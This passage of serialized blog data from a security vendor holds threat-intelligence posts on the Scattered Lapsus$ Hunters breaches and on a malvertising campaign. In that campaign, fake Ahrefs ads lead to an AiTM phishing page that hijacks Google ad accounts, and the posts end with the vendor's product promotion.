takeover.",{"data":19695,"content":19696,"nodeType":860},{},[19697],{"data":19698,"marks":19699,"value":19700,"nodeType":864},{},[],"Clearly, the success of these attacks shows the limitations of multiple control layers. Endpoint and network layer controls have no visibility of this attack surface. Identity-focused controls are being undermined by ghost logins and shadow IT. And the limitations of cloud security controls in their ability to encompass all apps, and detect and stop malicious actions in real-time (that often blend in seamlessly with normal user activity). ",{"data":19702,"content":19706,"nodeType":996},{"target":19703},{"sys":19704},{"id":19705,"type":1001,"linkType":1002},"4Dg3fZEGf7ShyQJ8jlNDME",[],{"data":19708,"content":19709,"nodeType":1005},{},[],{"data":19711,"content":19712,"nodeType":1009},{},[19713],{"data":19714,"marks":19715,"value":17636,"nodeType":864},{},[19716],{"type":899},{"data":19718,"content":19719,"nodeType":860},{},[19720],{"data":19721,"marks":19722,"value":19723,"nodeType":864},{},[],"Stopping attacks that are designed to evade established controls is in our DNA — it’s the reason Push was founded. ",{"data":19725,"content":19726,"nodeType":860},{},[19727],{"data":19728,"marks":19729,"value":19730,"nodeType":864},{},[],"The browser is the gateway to to the apps and identities that attackers are now targeting, with many attacks taking place inside the user’s browser — whether that’s entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA. ",{"data":19732,"content":19733,"nodeType":860},{},[19734],{"data":19735,"marks":19736,"value":19737,"nodeType":864},{},[],"Push’s browser-based security platform provides comprehensive detection and response capabilities against attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",{"data":19739,"content":19740,"nodeType":860},{},[19741,19744,19751,19755,19762],{"data":19742,"marks":19743,"value":16314,"nodeType":864},{},[],{"data":19745,"content":19746,"nodeType":883},{"uri":10269},[19747],{"data":19748,"marks":19749,"value":10275,"nodeType":864},{},[19750],{"type":1455},{"data":19752,"marks":19753,"value":19754,"nodeType":864},{},[]," or ",{"data":19756,"content":19757,"nodeType":883},{"uri":1700},[19758],{"data":19759,"marks":19760,"value":10299,"nodeType":864},{},[19761],{"type":1455},{"data":19763,"marks":19764,"value":2924,"nodeType":864},{},[],"\"Scattered Lapsus$ Hunters\" — how modern attackers exploit the gaps in your security stack ","How Scattered Lapsus$ Hunters breaches demonstrate the evolution of attacker TTPs, shaping the future of cyber attacks.","2025-11-13T00:00:00.000Z","scattered-lapsus-hunters",{"items":19770},[19771,19773],{"sys":19772,"name":6593},{"id":6592},{"sys":19774,"name":342},{"id":6596},{"items":19776},[19777],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":19778},{"url":2740},{"__typename":2059,"sys":19780,"content":19781,"title":10759,"synopsis":10760,"hashTags":59,"publishedDate":10761,"slug":10762,"tagsCollection":20668,"authorsCollection":20674},{"id":9754},{"json":19782},{"data":19783,"content":19784,"nodeType":856},{},[19785,19790,19796,19802,19809,19822,19827,19830,19837,19843,19849,19855,19861,19867,19873,19879,19885,19890,19895,19901,19906,19912,19918,19923,19928,19933,19938,19954,19964,19970,19975,19981,19987,20017,20023,20030,20036,20041,20047,20052,20058,20074,20080,20083,20090,20096,20179,20185,20190,20193,20200,20206,20212,20218,20254,20257,20264,20280,20286,20293,20485,20492,20522,20529,20536,20542,20549,20555,20562,20572,20579,20585,20592,20602,20609,20616,20623,20630,20637,20644,20654,20661],{"data":19786,"content":19789,"nodeType":996},{"target":19787},{"sys":19788},{"id":9763,"type":1001,"linkType":1002},[],{"data":19791,"content":19792,"nodeType":860},{},[19793],{"data":19794,"marks":19795,"value":9771,"nodeType":864},{},[],{"data":19797,"content":19798,"nodeType":860},{},[19799],{"data":19800,"marks":19801,"value":9778,"nodeType":864},{},[],{"data":19803,"content":19804,"nodeType":860},{},[19805],{"data":19806,"marks":19807,"value":9786,"nodeType":864},{},[19808],{"type":899},{"data":19810,"content":19811,"nodeType":860},{},[19812,19815,19819],{"data":19813,"marks":19814,"value":9793,"nodeType":864},{},[],{"data":19816,"marks":19817,"value":6029,"nodeType":864},{},[19818],{"type":899},{"data":19820,"marks":19821,"value":9801,"nodeType":864},{},[],{"data":19823,"content":19826,"nodeType":996},{"target":19824},{"sys":19825},{"id":9806,"type":1001,"linkType":1002},[],{"data":19828,"content":19829,"nodeType":1005},{},[],{"data":19831,"content":19832,"nodeType":1009},{},[19833],{"data":19834,"marks":19835,"value":9818,"nodeType":864},{},[19836],{"type":899},{"data":19838,"content":19839,"nodeType":860},{},[19840],{"data":19841,"marks":19842,"value":9825,"nodeType":864},{},[],{"data":19844,"content":19845,"nodeType":860},{},[19846],{"data":19847,"marks":19848,"value":9832,"nodeType":864},{},[],{"data":19850,"content":19851,"nodeType":1312},{},[19852],{"data":19853,"marks":19854,"value":9839,"nodeType":864},{},[],{"data":19856,"content":19857,"nodeType":860},{},[19858],{"data":19859,"marks":19860,"value":9846,"nodeType":864},{},[],{"data":19862,"content":19863,"nodeType":860},{},[19864],{"data":19865,"marks":19866,"value":9853,"nodeType":864},{},[],{"data":19868,"content":19869,"nodeType":860},{},[19870],{"data":19871,"marks":19872,"value":9860,"nodeType":864},{},[],{"data":19874,"content":19875,"nodeType":860},{},[19876],{"data":19877,"marks":19878,"value":9867,"nodeType":864},{},[],{"data":19880,"content":19881,"nodeType":860},{},[19882],{"data":19883,"marks":19884,"value":9874,"nodeType":864},{},[],{"data":19886,"content":19889,"nodeType":996},{"target":19887},{"sys":19888},{"id":9879,"type":1001,"linkType":1002},[],{"data":19891,"content":19894,"nodeType":996},{"target":19892},{"sys":19893},{"id":9885,"type":1001,"linkType":1002},[],{"data":19896,"content":19897,"nodeType":860},{},[19898],{"data":19899,"marks":19900,"value":9893,"nodeType":864},{},[],{"data":19902,"content":19905,"nodeType":996},{"target":19903},{"sys":19904},{"id":9898,"type":1001,"linkType":1002},[],{"data":19907,"content":19908,"nodeType":1312},{},[19909],{"data":19910,"marks":19911,"value":9906,"nodeType":864},{},[],{"data":19913,"content":19914,"nodeType":860},{},[19915],{"data":19916,"marks":19917,"value":9913,"nodeType":864},{},[],{"data":19919,"content":19922,"nodeType":996},{"target":19920},{"sys":19921},{"id":9918,"type":1001,"linkType":1002},[],{"data":19924,"content":19927,"nodeType":996},{"target":19925},{"sys":19926},{"id":9924,"type":1001,"linkType":1002},[],{"data":19929,"content":19932,"nodeType":996},{"target":19930},{"sys":19931},{"id":9930,"type":1001,"linkType":1002},[],{"data":19934,"content":19937,"nodeType":996},{"target":19935},{"sys":19936},{"id":9936,"type":1001,"linkType":1002},[],{"data":19939,"content":19940,"nodeType":860},{},[19941,19944,19951],{"data":19942,"marks":19943,"value":9944,"nodeType":864},{},[],{"data":19945,"content":19946,"nodeType":883},{"uri":9013},[19947],{"data":19948,"marks":19949,"value":9952,"nodeType":864},{},[19950],{"type":1455},{"data":19952,"marks":19953,"value":9956,"nodeType":864},{},[],{"data":19955,"content":19956,"nodeType":860},{},[19957,19961],{"data":19958,"marks":19959,"value":9964,"nodeType":864},{},[19960],{"type":899},{"data":19962,"marks":19963,"value":9968,"nodeType":864},{},[],{"data":19965,"content":19966,"nodeType":860},{},[19967],{"data":19968,"marks":19969,"value":9975,"nodeType":864},{},[],{"data":19971,"content":19974,"nodeType":996},{"target":19972},{"sys":19973},{"id":9980,"type":1001,"linkType":1002},[],{"data":19976,"content":19977,"nodeType":1312},{},[19978],{"data":19979,"marks":19980,"value":9988,"nodeType":864},{},[],{"data":19982,"content":19983,"nodeType":860},{},[19984],{"data":19985,"marks":19986,"value":9995,"nodeType":864},{},[],{"data":19988,"content":19989,"nodeType":941},{},[19990,19999,20008],{"data":19991,"content":19992,"nodeType":945},{},[19993],{"data":19994,"content":19995,"nodeType":860},{},[19996],{"data":19997,"marks":19998,"value":10008,"nodeType":864},{},[],{"data":20000,"content":20001,"nodeType":945},{},[20002],{"data":20003,"content":20004,"nodeType":860},{},[20005],{"data":20006,"marks":20007,"value":10018,"nodeType":864},{},[],{"data":20009,"content":20010,"nodeType":945},{},[20011],{"data":20012,"content":20013,"nodeType":860},{},[20014],{"data":20015,"marks":20016,"value":10028,"nodeType":864},{},[],{"data":20018,"content":20019,"nodeType":860},{},[20020],{"data":20021,"marks":20022,"value":10035,"nodeType":864},{},[],{"data":20024,"content":20025,"nodeType":860},{},[20026],{"data":20027,"marks":20028,"value":10043,"nodeType":864},{},[20029],{"type":899},{"data":20031,"content":20032,"nodeType":860},{},[20033],{"data":20034,"marks":20035,"value":10050,"nodeType":864},{},[],{"data":20037,"content":20040,"nodeType":996},{"target":20038},{"sys":20039},{"id":10055,"type":1001,"linkType":1002},[],{"data":20042,"content":20043,"nodeType":860},{},[20044],{"data":20045,"marks":20046,"value":10063,"nodeType":864},{},[],{"data":20048,"content":20051,"nodeType":996},{"target":20049},{"sys":20050},{"id":10068,"type":1001,"linkType":1002},[],{"data":20053,"content":20054,"nodeType":1312},{},[20055],{"data":20056,"marks":20057,"value":10076,"nodeType":864},{},[],{"data":20059,"content":20060,"nodeType":860},{},[20061,20064,20071],{"data":20062,"marks":20063,"value":10083,"nodeType":864},{},[],{"data":20065,"content":20066,"nodeType":883},{"uri":7124},[20067],{"data":20068,"marks":20069,"value":7129,"nodeType":864},{},[20070],{"type":1455},{"data":20072,"marks":20073,"value":10094,"nodeType":864},{},[],{"data":20075,"content":20076,"nodeType":860},{},[20077],{"data":20078,"marks":20079,"value":10101,"nodeType":864},{},[],{"data":20081,"content":20082,"nodeType":1005},{},[],{"data":20084,"content":20085,"nodeType":1009},{},[20086],{"data":20087,"marks":20088,"value":10112,"nodeType":864},{},[20089],{"type":899},{"data":20091,"content":20092,"nodeType":860},{},[20093],{"data":20094,"marks":20095,"value":10119,"nodeType":864},{},[],{"data":20097,"content":20098,"nodeType":941},{},[20099,20119,20139,20159],{"data":20100,"content":20101,"nodeType":945},{},[20102],{"data":20103,"content":20104,"nodeType":860},{},[20105,20108,20116],{"data":20106,"marks":20107,"value":21,"nodeType":864},{},[],{"data":20109,"content":20110,"nodeType":883},{"uri":10134},[20111],{"data":20112,"marks":20113,"value":10141,"nodeType":864},{},[20114,20115],{"type":1455},{"type":899},{"data":20117,"marks":20118,"value":10145,"nodeType":864},{},[],{"data":20120,"content":20121,"nodeType":945},{},[20122],{"data":20123,"content":20124,"nodeType":860},{},[20125,20128,20136],{"data":20126,"marks":20127,"value":21,"nodeType":864},{},[],{"data":20129,"content":20130,"nodeType":883},{"uri":10157},[20131],{"data":20132,"marks":20133,"value":10164,"nodeType":864},{},[20134,20135],{"type":1455},{"type":899},{"data":20137,"marks":20138,"value":10168,"nodeType":864},{},[],{"data":20140,"content":20141,"nodeType":945},{},[20142],{"data":20143,"content":20144,"nodeType":860},{},[20145,20148,20156],{"data":20146,"marks":20147,"value":21,"nodeType":864},{},[],{"data":20149,"content":20150,"nodeType":883},{"uri":10180},[20151],{"data":20152,"marks":20153,"value":10187,"nodeType":864},{},[20154,20155],{"type":1455},{"type":899},{"data":20157,"marks":20158,"value":10191,"nodeType":864},{},[],{"data":20160,"content":20161,"nodeType":945},{},[20162],{"data":20163,"content":20164,"nodeType":860},{},[20165,20168,20176],{"data":20166,"marks":20167,"value":21,"nodeType":864},{},[],{"data":20169,"content":20170,"nodeType":883},{"uri":10203},[20171],{"data":20172,"marks":20173,"value":10210,"nodeType":864},{},[20174,20175],{"type":1455},{"type":899},{"data":20177,"marks":20178,"value":10214,"nodeType":864},{},[],{"data":20180,"content":20181,"nodeType":860},{},[20182],{"data":20183,"marks":20184,"value":10221,"nodeType":864},{},[],{"data":20186,"content":20189,"nodeType":996},{"target":20187},{"sys":20188},{"id":10226,"type":1001,"linkType":1002},[],{"data":20191,"content":20192,"nodeType":1005},{},[],{"data":20194,"content":20195,"nodeType":1312},{},[20196],{"data":20197,"marks":20198,"value":10238,"nodeType":864},{},[20199],{"type":899},{"data":20201,"content":20202,"nodeType":860},{},[20203],{"data":20204,"marks":20205,"value":10245,"nodeType":864},{},[],{"data":20207,"content":20208,"nodeType":860},{},[20209],{"data":20210,"marks":20211,"value":10252,"nodeType":864},{},[],{"data":20213,"content":20214,"nodeType":860},{},[20215],{"data":20216,"marks":20217,"value":10259,"nodeType":864},{},[],{"data":20219,"content":20220,"nodeType":860},{},[20221,20224,20231,20234,20241,20244,20251],{"data":20222,"marks":20223,"value":10266,"nodeType":864},{},[],{"data":20225,"content":20226,"nodeType":883},{"uri":10269},[20227],{"data":20228,"marks":20229,"value":10275,"nodeType":864},{},[20230],{"type":1455},{"data":20232,"marks":20233,"value":3731,"nodeType":864},{},[],{"data":20235,"content":20236,"nodeType":883},{"uri":10281},[20237],{"data":20238,"marks":20239,"value":10287,"nodeType":864},{},[20240],{"type":1455},{"data":20242,"marks":20243,"value":10291,"nodeType":864},{},[],{"data":20245,"content":20246,"nodeType":883},{"uri":1700},[20247],{"data":20248,"marks":20249,"value":10299,"nodeType":864},{},[20250],{"type":1455},{"data":20252,"marks":20253,"value":2924,"nodeType":864},{},[],{"data":20255,"content":20256,"nodeType":1005},{},[],{"data":20258,"content":20259,"nodeType":1009},{},[20260],{"data":20261,"marks":20262,"value":5571,"nodeType":864},{},[20263],{"type":899},{"data":20265,"content":20266,"nodeType":860},{},[20267,20270,20277],{"data":20268,"marks":20269,"value":7245,"nodeType":864},{},[],{"data":20271,"content":20272,"nodeType":883},{"uri":7248},[20273],{"data":20274,"marks":20275,"value":7253,"nodeType":864},{},[20276],{"type":1455},{"data":20278,"marks":20279,"value":7257,"nodeType":864},{},[],{"data":20281,"content":20282,"nodeType":860},{},[20283],{"data":20284,"marks":20285,"value":10335,"nodeType":864},{},[],{"data":20287,"content":20288,"nodeType":860},{},[20289],{"data":20290,"marks":20291,"value":10343,"nodeType":864},{},[20292],{"type":899},{"data":20294,"content":20295,"nodeType":941},{},[20296,20305,20314,20323,20332,20341,20350,20359,20368,20377,20386,20395,20404,20413,20422,20431,20440,20449,20458,20467,20476],{"data":20297,"content":20298,"nodeType":945},{},[20299],{"data":20300,"content":20301,"nodeType":860},{},[20302],{"data":20303,"marks":20304,"value":10356,"nodeType":864},{},[],{"data":20306,"content":20307,"nodeType":945},{},[20308],{"data":20309,"content":20310,"nodeType":860},{},[20311],{"data":20312,"marks":20313,"value":10366,"nodeType":864},{},[],{"data":20315,"content":20316,"nodeType":945},{},[20317],{"data":20318,"content":20319,"nodeType":860},{},[20320],{"data":20321,"marks":20322,"value":10376,"nodeType":864},{},[],{"data":20324,"content":20325,"nodeType":945},{},[20326],{"data":20327,"content":20328,"nodeType":860},{},[20329],{"data":20330,"marks":20331,"value":10386,"nodeType":864},{},[],{"data":20333,"content":20334,"nodeType":945},{},[20335],{"data":20336,"content":20337,"nodeType":860},{},[20338],{"data":20339,"marks":20340,"value":10396,"nodeType":864},{},[],{"data":20342,"content":20343,"nodeType":945},{},[20344],{"data":20345,"content":20346,"nodeType":860},{},[20347],{"data":20348,"marks":20349,"value":10386,"nodeType":864},{},[],{"data":20351,"content":20352,"nodeType":945},{},[20353],{"data":20354,"content":20355,"nodeType":860},{},[20356],{"data":20357,"marks":20358,"value":10415,"nodeType":864},{},[],{"data":20360,"content":20361,"nodeType":945},{},[20362],{"data":20363,"content":20364,"nodeType":860},{},[20365],{"data":20366,"marks":20367,"value":10425,"nodeType":864},{},[],{"data":20369,"content":20370,"nodeType":945},{},[20371],{"data":20372,"content":20373,"nodeType":860},{},[20374],{"data":20375,"marks":20376,"value":10366,"nodeType":864},{},[],{"data":20378,"content":20379,"nodeType":945},{},[20380],{"data":20381,"content":20382,"nodeType":860},{},[20383],{"data":20384,"marks":20385,"value":10444,"nodeType":864},{},[],{"data":20387,"content":20388,"nodeType":945},{},[20389],{"data":20390,"content":20391,"nodeType":860},{},[20392],{"data":20393,"marks":20394,"value":10454,"nodeType":864},{},[],{"data":20396,"content":20397,"nodeType":945},{},[20398],{"data":20399,"content":20400,"nodeType":860},{},[20401],{"data":20402,"marks":20403,"value":10464,"nodeType":864},{},[],{"data":20405,"content":20406,"nodeType":945},{},[20407],{"data":20408,"content":20409,"nodeType":860},{},[20410],{"data":20411,"marks":20412,"value":10474,"nodeType":864},{},[],{"data":20414,"content":20415,"nodeType":945},{},[20416],{"data":20417,"content":20418,"nodeType":860},{},[20419],{"data":20420,"marks":20421,"value":10484,"nodeType":864},{},[],{"data":20423,"content":20424,"nodeType":945},{},[20425],{"data":20426,"content":20427,"nodeType":860},{},[20428],{"data":20429,"marks":20430,"value":10494,"nodeType":864},{},[],{"data":20432,"content":20433,"nodeType":945},{},[20434],{"data":20435,"content":20436,"nodeType":860},{},[20437],{"data":20438,"marks":20439,"value":10504,"nodeType":864},{},[],{"data":20441,"content":20442,"nodeType":945},{},[20443],{"data":20444,"content":20445,"nodeType":860},{},[20446],{"data":20447,"marks":20448,"value":10425,"nodeType":864},{},[],{"data":20450,"content":20451,"nodeType":945},{},[20452],{"data":20453,"content":20454,"nodeType":860},{},[20455],{"data":20456,"marks":20457,"value":10523,"nodeType":864},{},[],{"data":20459,"content":20460,"nodeType":945},{},[20461],{"data":20462,"content":20463,"nodeType":860},{},[20464],{"data":20465,"marks":20466,"value":10533,"nodeType":864},{},[],{"data":20468,"content":20469,"nodeType":945},{},[20470],{"data":20471,"content":20472,"nodeType":860},{},[20473],{"data":20474,"marks":20475,"value":10543,"nodeType":864},{},[],{"data":20477,"content":20478,"nodeType":945},{},[20479],{"data":20480,"content":20481,"nodeType":860},{},[20482],{"data":20483,"marks":20484,"value":10553,"nodeType":864},{},[],{"data":20486,"content":20487,"nodeType":860},{},[20488],{"data":20489,"marks":20490,"value":10561,"nodeType":864},{},[20491],{"type":899},{"data":20493,"content":20494,"nodeType":941},{},[20495,20504,20513],{"data":20496,"content":20497,"nodeType":945},{},[20498],{"data":20499,"content":20500,"nodeType":860},{},[20501],{"data":20502,"marks":20503,"value":10574,"nodeType":864},{},[],{"data":20505,"content":20506,"nodeType":945},{},[20507],{"data":20508,"content":20509,"nodeType":860},{},[20510],{"data":20511,"marks":20512,"value":10584,"nodeType":864},{},[],{"data":20514,"content":20515,"nodeType":945},{},[20516],{"data":20517,"content":20518,"nodeType":860},{},[20519],{"data":20520,"marks":20521,"value":10594,"nodeType":864},{},[],{"data":20523,"content":20524,"nodeType":860},{},[20525],{"data":20526,"marks":20527,"value":10602,"nodeType":864},{},[20528],{"type":899},{"data":20530,"content":20531,"nodeType":860},{},[20532],{"data":20533,"marks":20534,"value":10611,"nodeType":864},{},[20535],{"type":10610},{"data":20537,"content":20538,"nodeType":860},{},[20539],{"data":20540,"marks":20541,"value":21,"nodeType":864},{},[],{"data":20543,"content":20544,"nodeType":860},{},[20545],{"data":20546,"marks":20547,"value":10625,"nodeType":864},{},[20548],{"type":10610},{"data":20550,"content":20551,"nodeType":860},{},[20552],{"data":20553,"marks":20554,"value":10632,"nodeType":864},{},[],{"data":20556,"content":20557,"nodeType":860},{},[20558],{"data":20559,"marks":20560,"value":10640,"nodeType":864},{},[20561],{"type":10610},{"data":20563,"content":20564,"nodeType":860},{},[20565,20568],{"data":20566,"marks":20567,"value":10632,"nodeType":864},{},[],{"data":20569,"marks":20570,"value":10651,"nodeType":864},{},[20571],{"type":899},{"data":20573,"content":20574,"nodeType":860},{},[20575],{"data":20576,"marks":20577,"value":10659,"nodeType":864},{},[20578],{"type":10610},{"data":20580,"content":20581,"nodeType":860},{},[20582],{"data":20583,"marks":20584,"value":21,"nodeType":864},{},[],{"data":20586,"content":20587,"nodeType":860},{},[20588],{"data":20589,"marks":20590,"value":10673,"nodeType":864},{},[20591],{"type":10610},{"data":20593,"content":20594,"nodeType":860},{},[20595,20598],{"data":20596,"marks":20597,"value":10632,"nodeType":864},{},[],{"data":20599,"marks":20600,"value":10684,"nodeType":864},{},[20601],{"type":899},{"data":20603,"content":20604,"nodeType":860},{},[20605],{"data":20606,"marks":20607,"value":10692,"nodeType":864},{},[20608],{"type":10610},{"data":20610,"content":20611,"nodeType":860},{},[20612],{"data":20613,"marks":20614,"value":10700,"nodeType":864},{},[20615],{"type":10610},{"data":20617,"content":20618,"nodeType":860},{},[20619],{"data":20620,"marks":20621,"value":10708,"nodeType":864},{},[20622],{"type":10610},{"data":20624,"content":20625,"nodeType":860},{},[20626],{"data":20627,"marks":20628,"value":10716,"nodeType":864},{},[20629],{"type":10610},{"data":20631,"content":20632,"nodeType":860},{},[20633],{"data":20634,"marks":20635,"value":10724,"nodeType":864},{},[20636],{"type":10610},{"data":20638,"content":20639,"nodeType":860},{},[20640],{"data":20641,"marks":20642,"value":10732,"nodeType":864},{},[20643],{"type":10610},{"data":20645,"content":20646,"nodeType":860},{},[20647,20650],{"data":20648,"marks":20649,"value":10632,"nodeType":864},{},[],{"data":20651,"marks":20652,"value":10743,"nodeType":864},{},[20653],{"type":899},{"data":20655,"content":20656,"nodeType":860},{},[20657],{"data":20658,"marks":20659,"value":10692,"nodeType":864},{},[20660],{"type":10610},{"data":20662,"content":20663,"nodeType":860},{},[20664],{"data":20665,"marks":20666,"value":10758,"nodeType":864},{},[20667],{"type":10610},{"items":20669},[20670,20672],{"sys":20671,"name":6593},{"id":6592},{"sys":20673,"name":342},{"id":6596},{"items":20675},[20676],{"fullName":10772,"firstName":10773,"jobTitle":10774,"profilePicture":20677},{"url":10776},{"__typename":2059,"sys":20679,"content":20681,"title":21279,"synopsis":21280,"hashTags":59,"publishedDate":21281,"slug":21282,"tagsCollection":21283,"authorsCollection":21289},{"id":20680},"2YmiesBvJHGw4wiKEKzLUq",{"json":20682},{"data":20683,"content":20684,"nodeType":856},{},[20685,20692,20699,20748,20754,20761,20768,20774,20780,20786,20789,20797,20804,20810,20817,20823,20829,20836,20842,20859,20862,20870,20877,20884,20891,20898,20904,20922,20925,20933,20940,20994,21001,21008,21011,21019,21026,21033,21040,21066,21069,21076,21092,21099,21142,21149,21192,21199,21272],{"data":20686,"content":20687,"nodeType":860},{},[20688],{"data":20689,"marks":20690,"value":20691,"nodeType":864},{},[],"In recent months, we’ve seen a significant increase in the number of attacks targeting ad manager accounts. These attacks ultimately serve up an Attacker-in-the-Middle (AITM) phishing page designed to steal the victim’s Google account. ",{"data":20693,"content":20694,"nodeType":860},{},[20695],{"data":20696,"marks":20697,"value":20698,"nodeType":864},{},[],"Most recently, we reported on:",{"data":20700,"content":20701,"nodeType":941},{},[20702,20725],{"data":20703,"content":20704,"nodeType":945},{},[20705],{"data":20706,"content":20707,"nodeType":860},{},[20708,20712,20721],{"data":20709,"marks":20710,"value":20711,"nodeType":864},{},[],"A campaign running ",{"data":20713,"content":20715,"nodeType":883},{"uri":20714},"https://pushsecurity.com/blog/analysing-a-malvertising-attack-targeting-business-google-accounts/",[20716],{"data":20717,"marks":20718,"value":20720,"nodeType":864},{},[20719],{"type":1455},"fake malvertising ads for “Google Ads”",{"data":20722,"marks":20723,"value":20724,"nodeType":864},{},[]," in Google Search. ",{"data":20726,"content":20727,"nodeType":945},{},[20728],{"data":20729,"content":20730,"nodeType":860},{},[20731,20735,20744],{"data":20732,"marks":20733,"value":20734,"nodeType":864},{},[],"A campaign using sophisticated ",{"data":20736,"content":20738,"nodeType":883},{"uri":20737},"https://pushsecurity.com/blog/uncovering-a-calendly-themed-phishing-campaign/",[20739],{"data":20740,"marks":20741,"value":20743,"nodeType":864},{},[20742],{"type":1455},"Calendly-themed phishing lures",{"data":20745,"marks":20746,"value":20747,"nodeType":864},{},[]," targeting marketing professionals.",{"data":20749,"content":20753,"nodeType":996},{"target":20750},{"sys":20751},{"id":20752,"type":1001,"linkType":1002},"1ThnhFZQIhzV179qclvzFH",[],{"data":20755,"content":20756,"nodeType":860},{},[20757],{"data":20758,"marks":20759,"value":20760,"nodeType":864},{},[],"Now, we’ve seen the Google Ads malvertising campaign expand to run additional ads impersonating Ahrefs, an AI marketing platform. Crucially, employees with access to Ahrefs are highly likely to also have access to Google Ads, meaning that attackers can reliably target Google accounts via Ahrefs. ",{"data":20762,"content":20763,"nodeType":860},{},[20764],{"data":20765,"marks":20766,"value":20767,"nodeType":864},{},[],"You can see a demo of the phishing chain below. ",{"data":20769,"content":20773,"nodeType":996},{"target":20770},{"sys":20771},{"id":20772,"type":1001,"linkType":1002},"2XjyySGldgl9uPA7CZRms8",[],{"data":20775,"content":20779,"nodeType":996},{"target":20776},{"sys":20777},{"id":20778,"type":1001,"linkType":1002},"yB12nGF91iq15GoHWItaX",[],{"data":20781,"content":20785,"nodeType":996},{"target":20782},{"sys":20783},{"id":20784,"type":1001,"linkType":1002},"2NK29DaTd93kOctyWxV0RT",[],{"data":20787,"content":20788,"nodeType":1005},{},[],{"data":20790,"content":20791,"nodeType":1009},{},[20792],{"data":20793,"marks":20794,"value":20796,"nodeType":864},{},[20795],{"type":899},"Attack breakdown",{"data":20798,"content":20799,"nodeType":860},{},[20800],{"data":20801,"marks":20802,"value":20803,"nodeType":864},{},[],"Users searching for “ahrefs” on Google Search were served with a fake ad impersonating Ahrefs, hosted on Squarespace, a legitimate website building and hosting platform. Previously, we’d seen this campaign use hosting sites Odoo and Kartra to similar effect. ",{"data":20805,"content":20809,"nodeType":996},{"target":20806},{"sys":20807},{"id":20808,"type":1001,"linkType":1002},"59dhFey5rahm5sA20NudTl",[],{"data":20811,"content":20812,"nodeType":860},{},[20813],{"data":20814,"marks":20815,"value":20816,"nodeType":864},{},[],"Upon clicking the link, the victim was taken to a clone of the real Ahrefs site. Crucially, you can see that the domain is not the official Ahrefs domain. ",{"data":20818,"content":20822,"nodeType":996},{"target":20819},{"sys":20820},{"id":20821,"type":1001,"linkType":1002},"48fQUiJXC1qACKUUPDliS5",[],{"data":20824,"content":20828,"nodeType":996},{"target":20825},{"sys":20826},{"id":20827,"type":1001,"linkType":1002},"77iqOW1jDVt5Oxw8qTwnKG",[],{"data":20830,"content":20831,"nodeType":860},{},[20832],{"data":20833,"marks":20834,"value":20835,"nodeType":864},{},[],"However, the site is not fully interactable beyond the front page. Clicking on any link takes the user to a Google sign-in page. ",{"data":20837,"content":20841,"nodeType":996},{"target":20838},{"sys":20839},{"id":20840,"type":1001,"linkType":1002},"7t9BoUyIFN8dlBDksjsYlD",[],{"data":20843,"content":20844,"nodeType":860},{},[20845,20849,20856],{"data":20846,"marks":20847,"value":20848,"nodeType":864},{},[],"This is in fact an AITM phishing page that is designed to hijack the victim’s Google account. Entering credentials and completing the MFA check will result in the attacker stealing the app session and effectively taking over the account. The phishing kit used matches ",{"data":20850,"content":20851,"nodeType":883},{"uri":20714},[20852],{"data":20853,"marks":20854,"value":20855,"nodeType":864},{},[],"the previous malvertising detected impersonating Google Ads",{"data":20857,"marks":20858,"value":10094,"nodeType":864},{},[],{"data":20860,"content":20861,"nodeType":1005},{},[],{"data":20863,"content":20864,"nodeType":1009},{},[20865],{"data":20866,"marks":20867,"value":20869,"nodeType":864},{},[20868],{"type":899},"Why are attackers targeting ad manager accounts?",{"data":20871,"content":20872,"nodeType":860},{},[20873],{"data":20874,"marks":20875,"value":20876,"nodeType":864},{},[],"Ad Manager accounts on platforms like Google, Facebook, and LinkedIn have become lucrative targets for cybercriminals. By compromising these accounts, attackers can exploit the digital advertising ecosystem in various ways for financial gain. ",{"data":20878,"content":20879,"nodeType":860},{},[20880],{"data":20881,"marks":20882,"value":20883,"nodeType":864},{},[],"The ad industry’s scale makes it attractive to fraud. Estimates suggest digital ad fraud cost advertisers tens of billions, potentially nearing $100 billion or more, with projections reaching $172 billion by 2028.",{"data":20885,"content":20886,"nodeType":860},{},[20887],{"data":20888,"marks":20889,"value":20890,"nodeType":864},{},[],"A hijacked Google Ad Manager account gives attackers access to significant ad spend and account data which can be monetized illicitly. The tactics range from stealthy ad fraud to overt abuse like malicious ads or extortion schemes.",{"data":20892,"content":20893,"nodeType":860},{},[20894],{"data":20895,"marks":20896,"value":20897,"nodeType":864},{},[],"Pretty much every enterprise today advertises their services via Google ads — this makes attacks on these accounts pretty much a unanimous problem. Agencies managing numerous client accounts are put further at risk. For example, if an attacker can compromise an MCC account (used to manage several ad accounts) they get full access to the customer portfolio. ",{"data":20899,"content":20903,"nodeType":996},{"target":20900},{"sys":20901},{"id":20902,"type":1001,"linkType":1002},"1WPbstxHtdjnAKpF1rhCpW",[],{"data":20905,"content":20906,"nodeType":860},{},[20907,20911,20919],{"data":20908,"marks":20909,"value":20910,"nodeType":864},{},[],"Learn more about why attackers are targeting ad manager accounts ",{"data":20912,"content":20914,"nodeType":883},{"uri":20913},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis",[20915],{"data":20916,"marks":20917,"value":20918,"nodeType":864},{},[],"in our blog post",{"data":20920,"marks":20921,"value":10094,"nodeType":864},{},[],{"data":20923,"content":20924,"nodeType":1005},{},[],{"data":20926,"content":20927,"nodeType":1009},{},[20928],{"data":20929,"marks":20930,"value":20932,"nodeType":864},{},[20931],{"type":899},"Why malvertising? ",{"data":20934,"content":20935,"nodeType":860},{},[20936],{"data":20937,"marks":20938,"value":20939,"nodeType":864},{},[],"Malvertising scams happen across lots of different sites, but the most common platform we see targeted is Google Search. This takes advantage of users browsing to find a website and clicking the first link that appears — in this case a fake sponsored link taking you to the attacker’s page. ",{"data":20941,"content":20942,"nodeType":860},{},[20943,20947,20954,20958,20966,20969,20978,20981,20990],{"data":20944,"marks":20945,"value":20946,"nodeType":864},{},[],"Malvertising attacks delivered over channels like Google Search are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. Malvertising is an increasingly popular attack vector for the delivery of AITM phishing, malware downloads, and 